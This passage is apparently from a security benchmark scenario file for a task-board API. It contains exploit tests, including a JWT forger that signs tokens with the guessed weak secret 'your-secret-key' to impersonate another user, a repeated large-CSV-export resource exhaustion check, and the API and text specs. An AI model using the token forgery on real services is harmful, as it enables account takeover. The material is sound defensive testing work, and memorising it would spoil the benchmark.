                "Export %d returned path: %s; reported count=%s",
                j,
                redacted(resp_export_path),
                resp_count,
            )

            # Verify CSV file exists and measure size
            content = _read_file_with_retries(app, export_path, attempts=6, delay=0.5)
            if not content or not _exists_nonempty(content):
                app.logger.warning(
                    "Export %d: CSV not readable or empty: %s",
                    j,
                    redacted(export_path),
                )
                continue

            size = len(content)
            total_bytes += size
            largest_file = max(largest_file, size)
            contains_marker = _safe_contains(content, marker)

            app.logger.info(
                "Export %d: size=%0.2f MiB, marker_in_csv=%s, path=%s",
                j,
                _mb(size),
                bool(contains_marker),
                redacted(export_path),
            )

        app.logger.info(
            "Completed exports: files=%d, total_size=%0.2f MiB, largest=%0.2f MiB",
            len(export_paths),
            _mb(total_bytes),
            _mb(largest_file),
        )

        # 4) Assess impact
        # Success if we caused large server-side files to be written repeatedly.
        if total_bytes >= MIN_TOTAL_BYTES and largest_file >= MIN_SINGLE_BYTES:
            app.logger.info(
                "Detected uncontrolled resource consumption via repeated large CSV exports: total=%0.2f MiB",
                _mb(total_bytes),
            )
            findings.add(cwes.CWE.UNCONTROLLED_RESOURCE_CONSUMPTION)
        else:
            app.logger.warning(
                "Resource consumption below threshold: total=%0.2f MiB (need >= %0.2f MiB), largest=%0.2f MiB (need >= %0.2f MiB)",
                _mb(total_bytes),
                _mb(MIN_TOTAL_BYTES),
                _mb(largest_file),
                _mb(MIN_SINGLE_BYTES),
            )

        return findings
    except Exception as e:
        app.logger.exception("Exploit execution failed with exception: %s", e)
        return set()


def sec_test_insufficiently_protected_credentials(
    app: AppInstance,
) -> set[cwes.CWE] | None:
    """
    PoC for CWE-522: Insufficiently Protected Credentials
    - Assumes backend uses HS256 JWT with a weak hard-coded secret "your-secret-key".
    - Forges a JWT to impersonate another user and performs authenticated actions.
    On success, returns {cwes.CWE.INSUFFICIENTLY_PROTECTED_CREDENTIALS}, else set().
    """

    def _b64url_encode(b: bytes) -> str:
        return base64.urlsafe_b64encode(b).decode("utf-8").rstrip("=")

    def _b64url_decode(s: str) -> bytes:
        pad = "=" * ((4 - (len(s) % 4)) % 4)
        return base64.urlsafe_b64decode(s + pad)

    def _decode_jwt(
        token: str,
    ) -> Tuple[Optional[Dict[str, Any]], Optional[Dict[str, Any]], Optional[bytes]]:
        try:
            parts = token.split(".")
            if len(parts) != 3:
                return None, None, None
            h = json.loads(_b64url_decode(parts[0]).decode("utf-8"))
            p = json.loads(_b64url_decode(parts[1]).decode("utf-8"))
            sig = _b64url_decode(parts[2])
            return h, p, sig
        except Exception as e:
            app.logger.warning("Failed to decode JWT: %s", e)
            return None, None, None

    def _hs256_sign(key: bytes, signing_input: bytes) -> bytes:
        return hmac.new(key, signing_input, hashlib.sha256).digest()

    def _forge_hs256_jwt(
        secret_key: str,
        identity_claim: str,
        identity_value: str,
        extra_payload: Optional[Dict[str, Any]] = None,
    ) -> str:
        header = {"alg": "HS256", "typ": "JWT"}
        now = int(time.time())
        payload = {"iat": now, "exp": now + 3600, identity_claim: identity_value}
        if extra_payload and isinstance(extra_payload, dict):
            payload.update(extra_payload)
        header_b64 = _b64url_encode(
            json.dumps(header, separators=(",", ":")).encode("utf-8")
        )
        payload_b64 = _b64url_encode(
            json.dumps(payload, separators=(",", ":")).encode("utf-8")
        )
        signing_input = f"{header_b64}.{payload_b64}".encode("utf-8")
        signature_b64 = _b64url_encode(
            _hs256_sign(secret_key.encode("utf-8"), signing_input)
        )
        return f"{header_b64}.{payload_b64}.{signature_b64}"

    def _detect_identity_claim(p: Dict[str, Any]) -> Optional[str]:
        # Prefer common identity claims
        if isinstance(p, dict):
            if "sub" in p and isinstance(p.get("sub"), (str, int)):
                return "sub"
            if "username" in p and isinstance(p.get("username"), (str, int)):
                return "username"
        return None

    def _find_marker_in_tasks(tasks, marker: str) -> bool:
        try:
            for t in tasks or []:
                title = t.get("title")
                if isinstance(title, str) and marker in title:
                    return True
        except Exception:
            pass
        return False

    def _redact_marker(s: str, marker: str) -> str:
        try:
            return s.replace(marker, "MARKER")
        except Exception:
            return s

    def _read_file_with_retries(
        path: str, attempts: int = 5, delay: float = 0.2
    ) -> Optional[bytes]:
        last_exc = None
        for i in range(attempts):
            try:
                content = load_file_from_docker(app.container_id, path)
                return content
            except Exception as e:
                last_exc = e
                app.logger.debug(
                    "Retry %d/%d reading '%s' failed: %s", i + 1, attempts, path, e
                )
                time.sleep(delay)
        app.logger.warning(
            "Failed to read file after %d attempts: %s; last_err=%s",
            attempts,
            path,
            last_exc,
        )
        return None

    findings: Set[cwes.CWE] = set()

    # Unique suffix for usernames, export paths, and marker
    suffix = uuid.uuid4().hex[:8]
    victim_username = f"victim_{suffix}"
    attacker_username = f"attacker_{suffix}"
    victim_password = "VictimStrong#123"
    attacker_password = "AttackerStrong#123"
    export_path = f"/tmp/poc_{suffix}.csv"
    marker = generate_marker()

    app.logger.info(
        "Starting CWE-522 PoC with users: victim=%s, attacker=%s",
        victim_username,
        attacker_username,
    )

    # Register users
    if not register_user(app, victim_username, victim_password):
        app.logger.warning("Failed to register victim user; aborting.")
        return set()
    if not register_user(app, attacker_username, attacker_password):
        app.logger.warning("Failed to register attacker user; aborting.")
        return set()

    # Obtain a legitimate token to learn claim structure and alg
    attacker_token = obtain_token(app, attacker_username, attacker_password)
    if not attacker_token:
        app.logger.warning("Could not obtain attacker JWT; aborting.")
        return set()

    hdr, pl, _ = _decode_jwt(attacker_token)
    app.logger.info(
        "Decoded attacker JWT header=%s, payload_keys=%s",
        hdr,
        list(pl.keys()) if isinstance(pl, dict) else None,
    )

    alg = hdr.get("alg") if isinstance(hdr, dict) else None
    if not isinstance(alg, str) or not alg.startswith("HS"):
        app.logger.warning(
            "JWT alg is not symmetric HMAC (alg=%r); exploit may not apply; aborting.",
            alg,
        )
        return set()

    preferred_claim = _detect_identity_claim(pl if isinstance(pl, dict) else {})
    candidate_claims: List[str] = []
    if preferred_claim:
        candidate_claims.append(preferred_claim)
    # Try common alternatives
    for c in ["sub", "username"]:
        if c not in candidate_claims:
            candidate_claims.append(c)

    # Try forging a token for the victim with weak secret
    weak_secret = "your-secret-key"
    forged_token: Optional[str] = None
    used_claim: Optional[str] = None

    for claim in candidate_claims:
        try:
            tok = _forge_hs256_jwt(weak_secret, claim, victim_username)
            app.logger.info("Attempting forged JWT using claim '%s'", claim)
            # Quick validation by calling a protected endpoint that is harmless if rejected
            # We'll try creating a task to directly verify acceptance.
            title = f"{marker} report"
            due = "2025-12-31"
            task = create_task(
                app, tok, title=title, due=due, done=False, tags=["poc", "cwe-522"]
            )
            if task and isinstance(task, dict) and task.get("id"):
                app.logger.info(
                    "Forged token accepted with claim '%s'; created task id=%s",
                    claim,
                    task.get("id"),
                )
                forged_token = tok
                used_claim = claim
                break
            else:
                app.logger.info(
                    "Forged token with claim '%s' not accepted for create_task.", claim
                )
        except Exception as e:
            app.logger.warning(
                "Error attempting forged JWT with claim '%s': %s", claim, e
            )

    if not forged_token:
        app.logger.warning(
            "Failed to forge an accepted JWT with weak secret; exploit unsuccessful."
        )
        return set()

    # Query tasks as the impersonated victim and request CSV export
    filter_expr = f'title contains "{marker}"'
    query_resp = query_tasks(
        app,
        forged_token,
        filter_expr=filter_expr,
        sort_by="due",
        order="asc",
        limit=100,
        export_path=export_path,
    )
    if not query_resp or not isinstance(query_resp, dict):
        app.logger.warning("Query as victim failed or returned non-JSON; aborting.")
        return set()

    tasks = query_resp.get("tasks", [])
    count = query_resp.get("count")
    exp_path_ret = query_resp.get("export_path")

    has_marker = _find_marker_in_tasks(tasks, marker)
    app.logger.info(
        "Victim-query: count=%s, export_path=%s, marker_found=%s",
        count,
        exp_path_ret,
        has_marker,
    )

    if not has_marker or not isinstance(count, int) or count < 1:
        app.logger.warning(
            "Marker not found in victim's tasks or invalid count; exploit not demonstrated."
        )
        return set()

    # Optional: verify CSV was written and contains the marker
    csv_verified = False
    if isinstance(exp_path_ret, str) and exp_path_ret:
        content = _read_file_with_retries(exp_path_ret)
        if content:
            csv_verified = marker.encode() in content
            app.logger.info(
                "CSV export content check: exists=%s, marker_present=%s",
                bool(content),
                csv_verified,
            )
        else:
            app.logger.info(
                "CSV export not readable or empty at path: %s", exp_path_ret
            )
    else:
        app.logger.info(
            "export_path not returned in response; skipping CSV verification."
        )

    # Control query as attacker (should not see victim's tasks)
    attacker_query = query_tasks(
        app,
        attacker_token,
        filter_expr=filter_expr,
        sort_by="due",
        order="asc",
        limit=100,
    )
    if attacker_query and isinstance(attacker_query, dict):
        a_tasks = attacker_query.get("tasks", [])
        a_count = attacker_query.get("count")
        a_has_marker = _find_marker_in_tasks(a_tasks, marker)
        app.logger.info(
            "Attacker-query: count=%s, marker_found=%s (should be False ideally)",
            a_count,
            a_has_marker,
        )

    # At this point, we demonstrated the ability to impersonate victim via forged JWT and perform write+read operations
    app.logger.info(
        "CWE-522 PoC successful: forged token using weak secret 'your-secret-key' with claim '%s'.",
        used_claim,
    )
    return {cwes.CWE.INSUFFICIENTLY_PROTECTED_CREDENTIALS}


_API_SPEC = """
openapi: 3.0.3
info:
  title: FilterableTaskBoardwithCSVExport
  description: A backend where users register, obtain a bearer token, create personal tasks, and query their own tasks using a small filter language with optional CSV export to a server-side file.
  version: 1.0.0
paths:
  /users:
    post:
      summary: Create a new user account
      requestBody:
        required: true
        content:
          application/json:
            schema:
              $ref: '#/components/schemas/UserRegistration'
      responses:
        '201':
          description: User created
        '400':
          description: Invalid input
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Error'
        '422':
          description: Malformed request body
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Error'
  /auth/token:
    post:
      summary: Obtain a bearer token using username and password
      requestBody:
        required: true
        content:
          application/json:
            schema:
              $ref: '#/components/schemas/UserLogin'
      responses:
        '200':
          description: Bearer token issued
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/AuthToken'
        '400':
          description: Invalid credentials payload
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Error'
        '422':
          description: Malformed request body
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Error'
  /tasks:
    post:
      summary: Create a new task for the authenticated user
      security:
        - BearerAuth: []
      requestBody:
        required: true
        content:
          application/json:
            schema:
              $ref: '#/components/schemas/TaskInput'
      responses:
        '201':
          description: Task created
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Task'
        '400':
          description: Invalid task data
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Error'
        '422':
          description: Malformed request body
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Error'
        '401':
          description: Unauthorized
  /tasks/query:
    post:
      summary: Query the authenticated user's tasks with filters, sorting, limits, and optional CSV export
      description: Writes a server-side CSV when export_path is provided and returns the file path written.
      security:
        - BearerAuth: []
      requestBody:
        required: true
        content:
          application/json:
            schema:
              $ref: '#/components/schemas/QueryRequest'
      responses:
        '200':
          description: Query result
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/QueryResponse'
        '400':
          description: Invalid filter, sorting, or limit parameters
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Error'
        '422':
          description: Malformed request body
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Error'
        '401':
          description: Unauthorized
components:
  securitySchemes:
    BearerAuth:
      type: http
      scheme: bearer
      bearerFormat: JWT
  schemas:
    UserRegistration:
      type: object
      properties:
        username:
          type: string
          example: "alice"
        password:
          type: string
          format: password
          minLength: 8
          example: "S3cureP@ssw0rd"
      required:
        - username
        - password
    UserLogin:
      type: object
      properties:
        username:
          type: string
          example: "alice"
        password:
          type: string
          format: password
          example: "S3cureP@ssw0rd"
      required:
        - username
        - password
    AuthToken:
      type: object
      properties:
        token:
          type: string
          description: Bearer token to use in the Authorization header as "Bearer {token}"
          example: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
      required:
        - token
    TaskInput:
      type: object
      properties:
        title:
          type: string
          example: "Submit quarterly report"
        due:
          type: string
          format: date
          example: "2025-01-31"
        done:
          type: boolean
          default: false
          example: false
        tags:
          type: array
          items:
            type: string
          example: ["work", "finance"]
      required:
        - title
        - due
    Task:
      allOf:
        - $ref: '#/components/schemas/TaskInput'
        - type: object
          properties:
            id:
              type: string
              format: uuid
              example: "3f2d5c2e-7b34-4bb2-9d0f-8b8f1a9f3a21"
          required:
            - id
    QueryRequest:
      type: object
      properties:
        filter:
          type: string
          description: >
            Expression of predicates joined by AND.
            Operators:
            - title: =, !=, contains "sub"
            - due: =, !=, <, <=, >, >= (YYYY-MM-DD)
            - done: =, != (true/false)
            - tags: contains "tag"
            Example: title contains "report" AND due <= 2025-01-31 AND done = false AND tags contains "work"
          example: 'title contains "report" AND due <= 2025-01-31 AND done = false AND tags contains "work"'
        sort_by:
          type: string
          enum: [title, due]
          default: due
        order:
          type: string
          enum: [asc, desc]
          default: asc
        limit:
          type: integer
          minimum: 1
          maximum: 1000
          default: 100
        export_path:
          type: string
          description: Server-side file path to write CSV for the query result
          example: "/var/app/exports/alice_tasks.csv"
      required:
        - filter
    QueryResponse:
      type: object
      properties:
        tasks:
          type: array
          items:
            $ref: '#/components/schemas/Task'
        count:
          type: integer
          example: 2
        export_path:
          type: string
          description: Present if export_path was provided and the CSV file was written
          example: "/var/app/exports/alice_tasks.csv"
      required:
        - tasks
        - count
    Error:
      type: object
      properties:
        error:
          type: string
          example: "Invalid filter syntax"
"""

_TEXT_SPEC = """
The FilterableTaskBoardwithCSVExport API lets users register, obtain a bearer token, create personal tasks, and query their own tasks with a small filter language and optional CSV export.

Authentication
- Scheme: BearerAuth (HTTP bearer, JWT). Include Authorization: Bearer {token} on endpoints that require authentication.

User management
- POST /users
  - Creates a new user account.
  - Request (application/json): { username: string, password: string (minLength 8) }.
  - Responses: 201 (User created); 400 (Invalid input, Error); 422 (Malformed request body, Error).

- POST /auth/token
  - Issues a bearer token using username and password.
  - Request (application/json): { username: string, password: string }.
  - Response 200 (application/json): { token: string } to be used as "Bearer {token}".
  - Errors: 400 (Invalid credentials payload, Error); 422 (Malformed request body, Error).

Tasks
- Task model
  - TaskInput: title (string, required), due (string, format date YYYY-MM-DD, required), done (boolean, default false), tags (array of strings).
  - Task: TaskInput plus id (uuid, required).

- POST /tasks (auth required)
  - Creates a new task for the authenticated user.
  - Request (application/json): TaskInput.
  - Responses: 201 (application/json: Task); 400 (Invalid task data, Error); 422 (Malformed request body, Error); 401 (Unauthorized).

Querying tasks
- POST /tasks/query (auth required)
  - Queries the authenticated user’s tasks with filtering, sorting, limiting, and optional CSV export to a server-side file when export_path is provided.
  - Request (application/json): QueryRequest
    - filter (string, required): expression of predicates joined by AND.
      - title: =, !=, contains "sub"
      - due: =, !=, <, <=, >, >= (YYYY-MM-DD)
      - done: =, != (true/false)
      - tags: contains "tag"
      - Example: title contains "report" AND due <= 2025-01-31 AND done = false AND tags contains "work"
    - sort_by (title | due, default due)
    - order (asc | desc, default asc)
    - limit (integer, 1–1000, default 100)
    - export_path (string, optional): server-side file path to write CSV for the query result
  - Response 200 (application/json): QueryResponse
    - tasks: array of Task (ordered per sort_by and order)
    - count: integer (number of matched tasks)
    - export_path: string (present if export_path was provided and CSV was written)
  - Errors: 400 (Invalid filter, sorting, or limit parameters, Error); 422 (Malformed request body, Error); 401 (Unauthorized).

Error schema
- Error: { error: string } returned in JSON for error responses.
"""

from scenarios.base import Scenario

SCENARIO = Scenario(
    id="""FilterableTaskBoardwithCSVExport""",
    api_spec=_API_SPEC,
    text_spec=_TEXT_SPEC,
    short_app_description="""A backend where users create an account to receive a bearer token, add personal tasks, and query their own tasks using a tiny filter language. Each task has: title (string), due (YYYY-MM-DD), done (boolean), and tags (array of strings). The query endpoint accepts a filter expression composed of predicates joined by AND, with operators: title (=, !=, contains "sub"), due (=, !=, <, <=, >, >=), done (=, != with true/false), and tags (contains "tag"). It also supports sort_by (title or due), order (asc/desc), limit (int), and an optional export_path to write the query result as CSV to a server-side file. The response returns the matched tasks in the requested order, the count, and, if export_path was provided, the file path written.""",
    needs_db=True,
    needs_secret=False,
    scenario_instructions="""""",
    functional_tests=[
        func_test_end_to_end_query_with_filters_and_csv_export,
        func_test_query_sort_by_title_desc_limit,
        func_test_data_isolation_user_scope,
    ],
    security_tests=[
        sec_test_path_traversal,
        sec_test_sql_injection,
        sec_test_code_injection,
        sec_test_improper_access_control,
        sec_test_incorrect_authorization,
        sec_test_uncontrolled_resource_consumption,
        sec_test_insufficiently_protected_credentials,
    ],
)
